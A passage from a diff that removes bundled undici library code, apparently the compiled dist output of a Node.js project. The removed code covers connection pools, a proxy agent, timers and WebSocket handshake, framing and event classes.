pool[kQueue] - - let needDrain = false - - while (!needDrain) { - const item = queue.shift() - if (!item) { - break - } - pool[kQueued]-- - needDrain = !this.dispatch(item.opts, item.handler) - } - - this[kNeedDrain] = needDrain - - if (!this[kNeedDrain] && pool[kNeedDrain]) { - pool[kNeedDrain] = false - pool.emit('drain', origin, [pool, ...targets]) - } - - if (pool[kClosedResolve] && queue.isEmpty()) { - Promise - .all(pool[kClients].map(c => c.close())) - .then(pool[kClosedResolve]) - } - } - - this[kOnConnect] = (origin, targets) => { - pool.emit('connect', origin, [pool, ...targets]) - } - - this[kOnDisconnect] = (origin, targets, err) => { - pool.emit('disconnect', origin, [pool, ...targets], err) - } - - this[kOnConnectionError] = (origin, targets, err) => { - pool.emit('connectionError', origin, [pool, ...targets], err) - } - - this[kStats] = new PoolStats(this) - } - - get [kBusy] () { - return this[kNeedDrain] - } - - get [kConnected] () { - return this[kClients].filter(client => client[kConnected]).length - } - - get [kFree] () { - return this[kClients].filter(client => client[kConnected] && !client[kNeedDrain]).length - } - - get [kPending] () { - let ret = this[kQueued] - for (const { [kPending]: pending } of this[kClients]) { - ret += pending - } - return ret - } - - get [kRunning] () { - let ret = 0 - for (const { [kRunning]: running } of this[kClients]) { - ret += running - } - return ret - } - - get [kSize] () { - let ret = this[kQueued] - for (const { [kSize]: size } of this[kClients]) { - ret += size - } - return ret - } - - get stats () { - return this[kStats] - } - - async [kClose] () { - if (this[kQueue].isEmpty()) { - return Promise.all(this[kClients].map(c => c.close())) - } else { - return new Promise((resolve) => { - this[kClosedResolve] = resolve - }) - } - } - - async [kDestroy] (err) { - while (true) { - const item = this[kQueue].shift() - if (!item) { - break - } - item.handler.onError(err) - } - - return Promise.all(this[kClients].map(c => c.destroy(err))) - } - - [kDispatch] (opts, handler) { - const dispatcher = this[kGetDispatcher]() - - if (!dispatcher) { - this[kNeedDrain] = true - this[kQueue].push({ opts, handler }) - this[kQueued]++ - } else if (!dispatcher.dispatch(opts, handler)) { - dispatcher[kNeedDrain] = true - this[kNeedDrain] = !this[kGetDispatcher]() - } - - return !this[kNeedDrain] - } - - [kAddClient] (client) { - client - .on('drain', this[kOnDrain]) - .on('connect', this[kOnConnect]) - .on('disconnect', this[kOnDisconnect]) - .on('connectionError', this[kOnConnectionError]) - - this[kClients].push(client) - - if (this[kNeedDrain]) { - process.nextTick(() => { - if (this[kNeedDrain]) { - this[kOnDrain](client[kUrl], [this, client]) - } - }) - } - - return this - } - - [kRemoveClient] (client) { - client.close(() => { - const idx = this[kClients].indexOf(client) - if (idx !== -1) { - this[kClients].splice(idx, 1) - } - }) - - this[kNeedDrain] = this[kClients].some(dispatcher => ( - !dispatcher[kNeedDrain] && - dispatcher.closed !== true && - dispatcher.destroyed !== true - )) - } -} - -module.exports = { - PoolBase, - kClients, - kNeedDrain, - kAddClient, - kRemoveClient, - kGetDispatcher -} - - -/***/ }), - -/***/ 9689: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const { kFree, kConnected, kPending, kQueued, kRunning, kSize } = __nccwpck_require__(2785) -const kPool = Symbol('pool') - -class PoolStats { - constructor (pool) { - this[kPool] = pool - } - - get connected () { - return this[kPool][kConnected] - } - - get free () { - return this[kPool][kFree] - } - - get pending () { - return this[kPool][kPending] - } - - get queued () { - return this[kPool][kQueued] - } - - get running () { - return this[kPool][kRunning] - } - - get size () { - return this[kPool][kSize] - } -} - -module.exports = PoolStats - - -/***/ }), - -/***/ 4634: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - PoolBase, - kClients, - kNeedDrain, - kAddClient, - kGetDispatcher -} = __nccwpck_require__(3198) -const Client = __nccwpck_require__(3598) -const { - InvalidArgumentError -} = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { kUrl, kInterceptors } = __nccwpck_require__(2785) -const buildConnector = __nccwpck_require__(2067) - -const kOptions = Symbol('options') -const kConnections = Symbol('connections') -const kFactory = Symbol('factory') - -function defaultFactory (origin, opts) { - return new Client(origin, opts) -} - -class Pool extends PoolBase { - constructor (origin, { - connections, - factory = defaultFactory, - connect, - connectTimeout, - tls, - maxCachedSessions, - socketPath, - autoSelectFamily, - autoSelectFamilyAttemptTimeout, - allowH2, - ...options - } = {}) { - super() - - if (connections != null && (!Number.isFinite(connections) || connections < 0)) { - throw new InvalidArgumentError('invalid connections') - } - - if (typeof factory !== 'function') { - throw new InvalidArgumentError('factory must be a function.') - } - - if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { - throw new InvalidArgumentError('connect must be a function or an object') - } - - if (typeof connect !== 'function') { - connect = buildConnector({ - ...tls, - maxCachedSessions, - allowH2, - socketPath, - timeout: connectTimeout, - ...(util.nodeHasAutoSelectFamily && autoSelectFamily ? { autoSelectFamily, autoSelectFamilyAttemptTimeout } : undefined), - ...connect - }) - } - - this[kInterceptors] = options.interceptors && options.interceptors.Pool && Array.isArray(options.interceptors.Pool) - ? options.interceptors.Pool - : [] - this[kConnections] = connections || null - this[kUrl] = util.parseOrigin(origin) - this[kOptions] = { ...util.deepClone(options), connect, allowH2 } - this[kOptions].interceptors = options.interceptors - ? { ...options.interceptors } - : undefined - this[kFactory] = factory - } - - [kGetDispatcher] () { - let dispatcher = this[kClients].find(dispatcher => !dispatcher[kNeedDrain]) - - if (dispatcher) { - return dispatcher - } - - if (!this[kConnections] || this[kClients].length < this[kConnections]) { - dispatcher = this[kFactory](this[kUrl], this[kOptions]) - this[kAddClient](dispatcher) - } - - return dispatcher - } -} - -module.exports = Pool - - -/***/ }), - -/***/ 7858: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kProxy, kClose, kDestroy, kInterceptors } = __nccwpck_require__(2785) -const { URL } = __nccwpck_require__(7310) -const Agent = __nccwpck_require__(7890) -const Pool = __nccwpck_require__(4634) -const DispatcherBase = __nccwpck_require__(4839) -const { InvalidArgumentError, RequestAbortedError } = __nccwpck_require__(8045) -const buildConnector = __nccwpck_require__(2067) - -const kAgent = Symbol('proxy agent') -const kClient = Symbol('proxy client') -const kProxyHeaders = Symbol('proxy headers') -const kRequestTls = Symbol('request tls settings') -const kProxyTls = Symbol('proxy tls settings') -const kConnectEndpoint = Symbol('connect endpoint function') - -function defaultProtocolPort (protocol) { - return protocol === 'https:' ? 443 : 80 -} - -function buildProxyOptions (opts) { - if (typeof opts === 'string') { - opts = { uri: opts } - } - - if (!opts || !opts.uri) { - throw new InvalidArgumentError('Proxy opts.uri is mandatory') - } - - return { - uri: opts.uri, - protocol: opts.protocol || 'https' - } -} - -function defaultFactory (origin, opts) { - return new Pool(origin, opts) -} - -class ProxyAgent extends DispatcherBase { - constructor (opts) { - super(opts) - this[kProxy] = buildProxyOptions(opts) - this[kAgent] = new Agent(opts) - this[kInterceptors] = opts.interceptors && opts.interceptors.ProxyAgent && Array.isArray(opts.interceptors.ProxyAgent) - ? opts.interceptors.ProxyAgent - : [] - - if (typeof opts === 'string') { - opts = { uri: opts } - } - - if (!opts || !opts.uri) { - throw new InvalidArgumentError('Proxy opts.uri is mandatory') - } - - const { clientFactory = defaultFactory } = opts - - if (typeof clientFactory !== 'function') { - throw new InvalidArgumentError('Proxy opts.clientFactory must be a function.') - } - - this[kRequestTls] = opts.requestTls - this[kProxyTls] = opts.proxyTls - this[kProxyHeaders] = opts.headers || {} - - const resolvedUrl = new URL(opts.uri) - const { origin, port, host, username, password } = resolvedUrl - - if (opts.auth && opts.token) { - throw new InvalidArgumentError('opts.auth cannot be used in combination with opts.token') - } else if (opts.auth) { - /* @deprecated in favour of opts.token */ - this[kProxyHeaders]['proxy-authorization'] = `Basic ${opts.auth}` - } else if (opts.token) { - this[kProxyHeaders]['proxy-authorization'] = opts.token - } else if (username && password) { - this[kProxyHeaders]['proxy-authorization'] = `Basic ${Buffer.from(`${decodeURIComponent(username)}:${decodeURIComponent(password)}`).toString('base64')}` - } - - const connect = buildConnector({ ...opts.proxyTls }) - this[kConnectEndpoint] = buildConnector({ ...opts.requestTls }) - this[kClient] = clientFactory(resolvedUrl, { connect }) - this[kAgent] = new Agent({ - ...opts, - connect: async (opts, callback) => { - let requestedHost = opts.host - if (!opts.port) { - requestedHost += `:${defaultProtocolPort(opts.protocol)}` - } - try { - const { socket, statusCode } = await this[kClient].connect({ - origin, - port, - path: requestedHost, - signal: opts.signal, - headers: { - ...this[kProxyHeaders], - host - } - }) - if (statusCode !== 200) { - socket.on('error', () => {}).destroy() - callback(new RequestAbortedError(`Proxy response (${statusCode}) !== 200 when HTTP Tunneling`)) - } - if (opts.protocol !== 'https:') { - callback(null, socket) - return - } - let servername - if (this[kRequestTls]) { - servername = this[kRequestTls].servername - } else { - servername = opts.servername - } - this[kConnectEndpoint]({ ...opts, servername, httpSocket: socket }, callback) - } catch (err) { - callback(err) - } - } - }) - } - - dispatch (opts, handler) { - const { host } = new URL(opts.origin) - const headers = buildHeaders(opts.headers) - throwIfProxyAuthIsSent(headers) - return this[kAgent].dispatch( - { - ...opts, - headers: { - ...headers, - host - } - }, - handler - ) - } - - async [kClose] () { - await this[kAgent].close() - await this[kClient].close() - } - - async [kDestroy] () { - await this[kAgent].destroy() - await this[kClient].destroy() - } -} - -/** - * @param {string[] | Record} headers - * @returns {Record} - */ -function buildHeaders (headers) { - // When using undici.fetch, the headers list is stored - // as an array. - if (Array.isArray(headers)) { - /** @type {Record} */ - const headersPair = {} - - for (let i = 0; i < headers.length; i += 2) { - headersPair[headers[i]] = headers[i + 1] - } - - return headersPair - } - - return headers -} - -/** - * @param {Record} headers - * - * Previous versions of ProxyAgent suggests the Proxy-Authorization in request headers - * Nevertheless, it was changed and to avoid a security vulnerability by end users - * this check was created. - * It should be removed in the next major version for performance reasons - */ -function throwIfProxyAuthIsSent (headers) { - const existProxyAuth = headers && Object.keys(headers) - .find((key) => key.toLowerCase() === 'proxy-authorization') - if (existProxyAuth) { - throw new InvalidArgumentError('Proxy-Authorization should be sent in ProxyAgent constructor') - } -} - -module.exports = ProxyAgent - - -/***/ }), - -/***/ 9459: -/***/ ((module) => { - -"use strict"; - - -let fastNow = Date.now() -let fastNowTimeout - -const fastTimers = [] - -function onTimeout () { - fastNow = Date.now() - - let len = fastTimers.length - let idx = 0 - while (idx < len) { - const timer = fastTimers[idx] - - if (timer.state === 0) { - timer.state = fastNow + timer.delay - } else if (timer.state > 0 && fastNow >= timer.state) { - timer.state = -1 - timer.callback(timer.opaque) - } - - if (timer.state === -1) { - timer.state = -2 - if (idx !== len - 1) { - fastTimers[idx] = fastTimers.pop() - } else { - fastTimers.pop() - } - len -= 1 - } else { - idx += 1 - } - } - - if (fastTimers.length > 0) { - refreshTimeout() - } -} - -function refreshTimeout () { - if (fastNowTimeout && fastNowTimeout.refresh) { - fastNowTimeout.refresh() - } else { - clearTimeout(fastNowTimeout) - fastNowTimeout = setTimeout(onTimeout, 1e3) - if (fastNowTimeout.unref) { - fastNowTimeout.unref() - } - } -} - -class Timeout { - constructor (callback, delay, opaque) { - this.callback = callback - this.delay = delay - this.opaque = opaque - - // -2 not in timer list - // -1 in timer list but inactive - // 0 in timer list waiting for time - // > 0 in timer list waiting for time to expire - this.state = -2 - - this.refresh() - } - - refresh () { - if (this.state === -2) { - fastTimers.push(this) - if (!fastNowTimeout || fastTimers.length === 1) { - refreshTimeout() - } - } - - this.state = 0 - } - - clear () { - this.state = -1 - } -} - -module.exports = { - setTimeout (callback, delay, opaque) { - return delay < 1e3 - ? setTimeout(callback, delay, opaque) - : new Timeout(callback, delay, opaque) - }, - clearTimeout (timeout) { - if (timeout instanceof Timeout) { - timeout.clear() - } else { - clearTimeout(timeout) - } - } -} - - -/***/ }), - -/***/ 5354: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const diagnosticsChannel = __nccwpck_require__(7643) -const { uid, states } = __nccwpck_require__(9188) -const { - kReadyState, - kSentClose, - kByteParser, - kReceivedClose -} = __nccwpck_require__(7578) -const { fireEvent, failWebsocketConnection } = __nccwpck_require__(5515) -const { CloseEvent } = __nccwpck_require__(2611) -const { makeRequest } = __nccwpck_require__(8359) -const { fetching } = __nccwpck_require__(4881) -const { Headers } = __nccwpck_require__(554) -const { getGlobalDispatcher } = __nccwpck_require__(1892) -const { kHeadersList } = __nccwpck_require__(2785) - -const channels = {} -channels.open = diagnosticsChannel.channel('undici:websocket:open') -channels.close = diagnosticsChannel.channel('undici:websocket:close') -channels.socketError = diagnosticsChannel.channel('undici:websocket:socket_error') - -/** @type {import('crypto')} */ -let crypto -try { - crypto = __nccwpck_require__(6113) -} catch { - -} - -/** - * @see https://websockets.spec.whatwg.org/#concept-websocket-establish - * @param {URL} url - * @param {string|string[]} protocols - * @param {import('./websocket').WebSocket} ws - * @param {(response: any) => void} onEstablish - * @param {Partial} options - */ -function establishWebSocketConnection (url, protocols, ws, onEstablish, options) { - // 1. Let requestURL be a copy of url, with its scheme set to "http", if url’s - // scheme is "ws", and to "https" otherwise. - const requestURL = url - - requestURL.protocol = url.protocol === 'ws:' ? 'http:' : 'https:' - - // 2. Let request be a new request, whose URL is requestURL, client is client, - // service-workers mode is "none", referrer is "no-referrer", mode is - // "websocket", credentials mode is "include", cache mode is "no-store" , - // and redirect mode is "error". - const request = makeRequest({ - urlList: [requestURL], - serviceWorkers: 'none', - referrer: 'no-referrer', - mode: 'websocket', - credentials: 'include', - cache: 'no-store', - redirect: 'error' - }) - - // Note: undici extension, allow setting custom headers. - if (options.headers) { - const headersList = new Headers(options.headers)[kHeadersList] - - request.headersList = headersList - } - - // 3. Append (`Upgrade`, `websocket`) to request’s header list. - // 4. Append (`Connection`, `Upgrade`) to request’s header list. - // Note: both of these are handled by undici currently. - // https://github.com/nodejs/undici/blob/68c269c4144c446f3f1220951338daef4a6b5ec4/lib/client.js#L1397 - - // 5. Let keyValue be a nonce consisting of a randomly selected - // 16-byte value that has been forgiving-base64-encoded and - // isomorphic encoded. - const keyValue = crypto.randomBytes(16).toString('base64') - - // 6. Append (`Sec-WebSocket-Key`, keyValue) to request’s - // header list. - request.headersList.append('sec-websocket-key', keyValue) - - // 7. Append (`Sec-WebSocket-Version`, `13`) to request’s - // header list. - request.headersList.append('sec-websocket-version', '13') - - // 8. For each protocol in protocols, combine - // (`Sec-WebSocket-Protocol`, protocol) in request’s header - // list. - for (const protocol of protocols) { - request.headersList.append('sec-websocket-protocol', protocol) - } - - // 9. Let permessageDeflate be a user-agent defined - // "permessage-deflate" extension header value. - // https://github.com/mozilla/gecko-dev/blob/ce78234f5e653a5d3916813ff990f053510227bc/netwerk/protocol/websocket/WebSocketChannel.cpp#L2673 - // TODO: enable once permessage-deflate is supported - const permessageDeflate = '' // 'permessage-deflate; 15' - - // 10. Append (`Sec-WebSocket-Extensions`, permessageDeflate) to - // request’s header list. - // request.headersList.append('sec-websocket-extensions', permessageDeflate) - - // 11. Fetch request with useParallelQueue set to true, and - // processResponse given response being these steps: - const controller = fetching({ - request, - useParallelQueue: true, - dispatcher: options.dispatcher ?? getGlobalDispatcher(), - processResponse (response) { - // 1. If response is a network error or its status is not 101, - // fail the WebSocket connection. - if (response.type === 'error' || response.status !== 101) { - failWebsocketConnection(ws, 'Received network error or non-101 status code.') - return - } - - // 2. If protocols is not the empty list and extracting header - // list values given `Sec-WebSocket-Protocol` and response’s - // header list results in null, failure, or the empty byte - // sequence, then fail the WebSocket connection. - if (protocols.length !== 0 && !response.headersList.get('Sec-WebSocket-Protocol')) { - failWebsocketConnection(ws, 'Server did not respond with sent protocols.') - return - } - - // 3. Follow the requirements stated step 2 to step 6, inclusive, - // of the last set of steps in section 4.1 of The WebSocket - // Protocol to validate response. This either results in fail - // the WebSocket connection or the WebSocket connection is - // established. - - // 2. If the response lacks an |Upgrade| header field or the |Upgrade| - // header field contains a value that is not an ASCII case- - // insensitive match for the value "websocket", the client MUST - // _Fail the WebSocket Connection_. - if (response.headersList.get('Upgrade')?.toLowerCase() !== 'websocket') { - failWebsocketConnection(ws, 'Server did not set Upgrade header to "websocket".') - return - } - - // 3. If the response lacks a |Connection| header field or the - // |Connection| header field doesn't contain a token that is an - // ASCII case-insensitive match for the value "Upgrade", the client - // MUST _Fail the WebSocket Connection_. - if (response.headersList.get('Connection')?.toLowerCase() !== 'upgrade') { - failWebsocketConnection(ws, 'Server did not set Connection header to "upgrade".') - return - } - - // 4. If the response lacks a |Sec-WebSocket-Accept| header field or - // the |Sec-WebSocket-Accept| contains a value other than the - // base64-encoded SHA-1 of the concatenation of the |Sec-WebSocket- - // Key| (as a string, not base64-decoded) with the string "258EAFA5- - // E914-47DA-95CA-C5AB0DC85B11" but ignoring any leading and - // trailing whitespace, the client MUST _Fail the WebSocket - // Connection_. - const secWSAccept = response.headersList.get('Sec-WebSocket-Accept') - const digest = crypto.createHash('sha1').update(keyValue + uid).digest('base64') - if (secWSAccept !== digest) { - failWebsocketConnection(ws, 'Incorrect hash received in Sec-WebSocket-Accept header.') - return - } - - // 5. If the response includes a |Sec-WebSocket-Extensions| header - // field and this header field indicates the use of an extension - // that was not present in the client's handshake (the server has - // indicated an extension not requested by the client), the client - // MUST _Fail the WebSocket Connection_. (The parsing of this - // header field to determine which extensions are requested is - // discussed in Section 9.1.) - const secExtension = response.headersList.get('Sec-WebSocket-Extensions') - - if (secExtension !== null && secExtension !== permessageDeflate) { - failWebsocketConnection(ws, 'Received different permessage-deflate than the one set.') - return - } - - // 6. If the response includes a |Sec-WebSocket-Protocol| header field - // and this header field indicates the use of a subprotocol that was - // not present in the client's handshake (the server has indicated a - // subprotocol not requested by the client), the client MUST _Fail - // the WebSocket Connection_. - const secProtocol = response.headersList.get('Sec-WebSocket-Protocol') - - if (secProtocol !== null && secProtocol !== request.headersList.get('Sec-WebSocket-Protocol')) { - failWebsocketConnection(ws, 'Protocol was not set in the opening handshake.') - return - } - - response.socket.on('data', onSocketData) - response.socket.on('close', onSocketClose) - response.socket.on('error', onSocketError) - - if (channels.open.hasSubscribers) { - channels.open.publish({ - address: response.socket.address(), - protocol: secProtocol, - extensions: secExtension - }) - } - - onEstablish(response) - } - }) - - return controller -} - -/** - * @param {Buffer} chunk - */ -function onSocketData (chunk) { - if (!this.ws[kByteParser].write(chunk)) { - this.pause() - } -} - -/** - * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol - * @see https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.4 - */ -function onSocketClose () { - const { ws } = this - - // If the TCP connection was closed after the - // WebSocket closing handshake was completed, the WebSocket connection - // is said to have been closed _cleanly_. - const wasClean = ws[kSentClose] && ws[kReceivedClose] - - let code = 1005 - let reason = '' - - const result = ws[kByteParser].closingInfo - - if (result) { - code = result.code ?? 1005 - reason = result.reason - } else if (!ws[kSentClose]) { - // If _The WebSocket - // Connection is Closed_ and no Close control frame was received by the - // endpoint (such as could occur if the underlying transport connection - // is lost), _The WebSocket Connection Close Code_ is considered to be - // 1006. - code = 1006 - } - - // 1. Change the ready state to CLOSED (3). - ws[kReadyState] = states.CLOSED - - // 2. If the user agent was required to fail the WebSocket - // connection, or if the WebSocket connection was closed - // after being flagged as full, fire an event named error - // at the WebSocket object. - // TODO - - // 3. Fire an event named close at the WebSocket object, - // using CloseEvent, with the wasClean attribute - // initialized to true if the connection closed cleanly - // and false otherwise, the code attribute initialized to - // the WebSocket connection close code, and the reason - // attribute initialized to the result of applying UTF-8 - // decode without BOM to the WebSocket connection close - // reason. - fireEvent('close', ws, CloseEvent, { - wasClean, code, reason - }) - - if (channels.close.hasSubscribers) { - channels.close.publish({ - websocket: ws, - code, - reason - }) - } -} - -function onSocketError (error) { - const { ws } = this - - ws[kReadyState] = states.CLOSING - - if (channels.socketError.hasSubscribers) { - channels.socketError.publish(error) - } - - this.destroy() -} - -module.exports = { - establishWebSocketConnection -} - - -/***/ }), - -/***/ 9188: -/***/ ((module) => { - -"use strict"; - - -// This is a Globally Unique Identifier unique used -// to validate that the endpoint accepts websocket -// connections. -// See https://www.rfc-editor.org/rfc/rfc6455.html#section-1.3 -const uid = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11' - -/** @type {PropertyDescriptor} */ -const staticPropertyDescriptors = { - enumerable: true, - writable: false, - configurable: false -} - -const states = { - CONNECTING: 0, - OPEN: 1, - CLOSING: 2, - CLOSED: 3 -} - -const opcodes = { - CONTINUATION: 0x0, - TEXT: 0x1, - BINARY: 0x2, - CLOSE: 0x8, - PING: 0x9, - PONG: 0xA -} - -const maxUnsigned16Bit = 2 ** 16 - 1 // 65535 - -const parserStates = { - INFO: 0, - PAYLOADLENGTH_16: 2, - PAYLOADLENGTH_64: 3, - READ_DATA: 4 -} - -const emptyBuffer = Buffer.allocUnsafe(0) - -module.exports = { - uid, - staticPropertyDescriptors, - states, - opcodes, - maxUnsigned16Bit, - parserStates, - emptyBuffer -} - - -/***/ }), - -/***/ 2611: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { webidl } = __nccwpck_require__(1744) -const { kEnumerableProperty } = __nccwpck_require__(3983) -const { MessagePort } = __nccwpck_require__(1267) - -/** - * @see https://html.spec.whatwg.org/multipage/comms.html#messageevent - */ -class MessageEvent extends Event { - #eventInit - - constructor (type, eventInitDict = {}) { - webidl.argumentLengthCheck(arguments, 1, { header: 'MessageEvent constructor' }) - - type = webidl.converters.DOMString(type) - eventInitDict = webidl.converters.MessageEventInit(eventInitDict) - - super(type, eventInitDict) - - this.#eventInit = eventInitDict - } - - get data () { - webidl.brandCheck(this, MessageEvent) - - return this.#eventInit.data - } - - get origin () { - webidl.brandCheck(this, MessageEvent) - - return this.#eventInit.origin - } - - get lastEventId () { - webidl.brandCheck(this, MessageEvent) - - return this.#eventInit.lastEventId - } - - get source () { - webidl.brandCheck(this, MessageEvent) - - return this.#eventInit.source - } - - get ports () { - webidl.brandCheck(this, MessageEvent) - - if (!Object.isFrozen(this.#eventInit.ports)) { - Object.freeze(this.#eventInit.ports) - } - - return this.#eventInit.ports - } - - initMessageEvent ( - type, - bubbles = false, - cancelable = false, - data = null, - origin = '', - lastEventId = '', - source = null, - ports = [] - ) { - webidl.brandCheck(this, MessageEvent) - - webidl.argumentLengthCheck(arguments, 1, { header: 'MessageEvent.initMessageEvent' }) - - return new MessageEvent(type, { - bubbles, cancelable, data, origin, lastEventId, source, ports - }) - } -} - -/** - * @see https://websockets.spec.whatwg.org/#the-closeevent-interface - */ -class CloseEvent extends Event { - #eventInit - - constructor (type, eventInitDict = {}) { - webidl.argumentLengthCheck(arguments, 1, { header: 'CloseEvent constructor' }) - - type = webidl.converters.DOMString(type) - eventInitDict = webidl.converters.CloseEventInit(eventInitDict) - - super(type, eventInitDict) - - this.#eventInit = eventInitDict - } - - get wasClean () { - webidl.brandCheck(this, CloseEvent) - - return this.#eventInit.wasClean - } - - get code () { - webidl.brandCheck(this, CloseEvent) - - return this.#eventInit.code - } - - get reason () { - webidl.brandCheck(this, CloseEvent) - - return this.#eventInit.reason - } -} - -// https://html.spec.whatwg.org/multipage/webappapis.html#the-errorevent-interface -class ErrorEvent extends Event { - #eventInit - - constructor (type, eventInitDict) { - webidl.argumentLengthCheck(arguments, 1, { header: 'ErrorEvent constructor' }) - - super(type, eventInitDict) - - type = webidl.converters.DOMString(type) - eventInitDict = webidl.converters.ErrorEventInit(eventInitDict ?? {}) - - this.#eventInit = eventInitDict - } - - get message () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.message - } - - get filename () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.filename - } - - get lineno () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.lineno - } - - get colno () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.colno - } - - get error () { - webidl.brandCheck(this, ErrorEvent) - - return this.#eventInit.error - } -} - -Object.defineProperties(MessageEvent.prototype, { - [Symbol.toStringTag]: { - value: 'MessageEvent', - configurable: true - }, - data: kEnumerableProperty, - origin: kEnumerableProperty, - lastEventId: kEnumerableProperty, - source: kEnumerableProperty, - ports: kEnumerableProperty, - initMessageEvent: kEnumerableProperty -}) - -Object.defineProperties(CloseEvent.prototype, { - [Symbol.toStringTag]: { - value: 'CloseEvent', - configurable: true - }, - reason: kEnumerableProperty, - code: kEnumerableProperty, - wasClean: kEnumerableProperty -}) - -Object.defineProperties(ErrorEvent.prototype, { - [Symbol.toStringTag]: { - value: 'ErrorEvent', - configurable: true - }, - message: kEnumerableProperty, - filename: kEnumerableProperty, - lineno: kEnumerableProperty, - colno: kEnumerableProperty, - error: kEnumerableProperty -}) - -webidl.converters.MessagePort = webidl.interfaceConverter(MessagePort) - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.MessagePort -) - -const eventInit = [ - { - key: 'bubbles', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'cancelable', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'composed', - converter: webidl.converters.boolean, - defaultValue: false - } -] - -webidl.converters.MessageEventInit = webidl.dictionaryConverter([ - ...eventInit, - { - key: 'data', - converter: webidl.converters.any, - defaultValue: null - }, - { - key: 'origin', - converter: webidl.converters.USVString, - defaultValue: '' - }, - { - key: 'lastEventId', - converter: webidl.converters.DOMString, - defaultValue: '' - }, - { - key: 'source', - // Node doesn't implement WindowProxy or ServiceWorker, so the only - // valid value for source is a MessagePort. - converter: webidl.nullableConverter(webidl.converters.MessagePort), - defaultValue: null - }, - { - key: 'ports', - converter: webidl.converters['sequence'], - get defaultValue () { - return [] - } - } -]) - -webidl.converters.CloseEventInit = webidl.dictionaryConverter([ - ...eventInit, - { - key: 'wasClean', - converter: webidl.converters.boolean, - defaultValue: false - }, - { - key: 'code', - converter: webidl.converters['unsigned short'], - defaultValue: 0 - }, - { - key: 'reason', - converter: webidl.converters.USVString, - defaultValue: '' - } -]) - -webidl.converters.ErrorEventInit = webidl.dictionaryConverter([ - ...eventInit, - { - key: 'message', - converter: webidl.converters.DOMString, - defaultValue: '' - }, - { - key: 'filename', - converter: webidl.converters.USVString, - defaultValue: '' - }, - { - key: 'lineno', - converter: webidl.converters['unsigned long'], - defaultValue: 0 - }, - { - key: 'colno', - converter: webidl.converters['unsigned long'], - defaultValue: 0 - }, - { - key: 'error', - converter: webidl.converters.any - } -]) - -module.exports = { - MessageEvent, - CloseEvent, - ErrorEvent -} - - -/***/ }), - -/***/ 5444: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { maxUnsigned16Bit } = __nccwpck_require__(9188) - -/** @type {import('crypto')} */ -let crypto -try { - crypto = __nccwpck_require__(6113) -} catch { - -} - -class WebsocketFrameSend { - /** - * @param {Buffer|undefined} data - */ - constructor (data) { - this.frameData = data - this.maskKey = crypto.randomBytes(4) - } - - createFrame (opcode) { - const bodyLength = this.frameData?.byteLength ?? 0 - - /** @type {number} */ - let payloadLength = bodyLength // 0-125 - let offset = 6 - - if (bodyLength > maxUnsigned16Bit) { - offset += 8 // payload length is next 8 bytes - payloadLength = 127 - } else if (bodyLength > 125) { - offset += 2 // payload length is next 2 bytes - payloadLength = 126 - } - - const buffer = Buffer.allocUnsafe(bodyLength + offset) - - // Clear first 2 bytes, everything else is overwritten - buffer[0] = buffer[1] = 0 - buffer[0] |= 0x80 // FIN - buffer[0] = (buffer[0] & 0xF0) + opcode // opcode - - /*! ws. MIT License. Einar Otto Stangvik */ - buffer[offset - 4] = this.maskKey[0] - buffer[offset - 3] = this.maskKey[1] - buffer[offset - 2] = this.maskKey[2] - buffer[offset - 1] = this.maskKey[3] - - buffer[1] = payloadLength - - if (payloadLength === 126) { - buffer.writeUInt16BE(bodyLength, 2) - } else if (payloadLength === 127) { - // Clear extended payload length - buffer[2] = buffer[3] = 0 - buffer.writeUIntBE(bodyLength, 4, 6) - } - - buffer[1] |= 0x80 // MASK - - // mask body - for (let i = 0; i < bodyLength; i++) { - buffer[offset + i] = this.frameData[i] ^ this.maskKey[i % 4] - } - - return buffer - } -} - -module.exports = { - WebsocketFrameSend -} - - -/***/ }), - -/***/ 1688: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { Writable } = __nccwpck_require__(2781) -const diagnosticsChannel = __nccwpck_require__(7643) -const { parserStates, opcodes, states, emptyBuffer } = __nccwpck_require__(9188) -const { kReadyState, kSentClose, kResponse, kReceivedClose } = __nccwpck_require__(7578) -const { isValidStatusCode, failWebsocketConnection, websocketMessageReceived } = __nccwpck_require__(5515) -const { WebsocketFrameSend } = __nccwpck_require__(5444) - -// This code was influenced by ws released under the MIT license. -// Copyright (c) 2011 Einar Otto Stangvik -// Copyright (c) 2013 Arnout Kazemier and contributors -// Copyright (c) 2016 Luigi Pinca and contributors - -const channels = {} -channels.ping = diagnosticsChannel.channel('undici:websocket:ping') -channels.pong = diagnosticsChannel.channel('undici:websocket:pong') - -class ByteParser extends Writable { - #buffers = [] - #byteOffset = 0 - - #state = parserStates.INFO - - #info = {} - #fragments = [] - - constructor (ws) { - super() - - this.ws = ws - } - - /** - * @param {Buffer} chunk - * @param {() => void} callback - */ - _write (chunk, _, callback) { - this.#buffers.push(chunk) - this.#byteOffset += chunk.length - - this.run(callback) - } - - /** - * Runs whenever a new chunk is received. - * Callback is called whenever there are no more chunks buffering, - * or not enough bytes are buffered to parse. - */ - run (callback) { - while (true) { - if (this.#state === parserStates.INFO) { - // If there aren't enough bytes to parse the payload length, etc. - if (this.#byteOffset < 2) { - return callback() - } - - const buffer = this.consume(2) - - this.#info.fin = (buffer[0] & 0x80) !== 0 - this.#info.opcode = buffer[0] & 0x0F - - // If we receive a fragmented message, we use the type of the first - // frame to parse the full message as binary/text, when it's terminated - this.#info.originalOpcode ??= 